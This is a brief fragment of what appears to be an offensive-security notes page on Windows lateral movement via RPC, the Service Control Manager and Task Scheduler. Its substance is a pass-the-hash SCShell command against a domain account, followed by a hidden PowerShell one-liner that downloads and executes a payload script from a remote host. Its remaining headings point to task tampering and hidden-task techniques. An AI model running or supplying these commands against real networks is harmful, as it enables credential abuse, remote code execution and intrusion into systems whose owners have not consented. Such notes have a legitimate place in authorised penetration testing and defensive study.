RPC
Remote Procedure Call
SCM
Using Python implementation and PtH:
$ python scshell.py MEGACORP/[email protected] -hashes :fc525c9683e8fe067095ba2ddc971889 -service-name lfsvc
SCShell>C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://10.10.13.37:8080/payload.ps1')Task Scheduler
RPC
Task Tampering
Hidden Tasks
GhostTask
Tools
go-msrpc / goexec
Research / Fuzzing
Last updated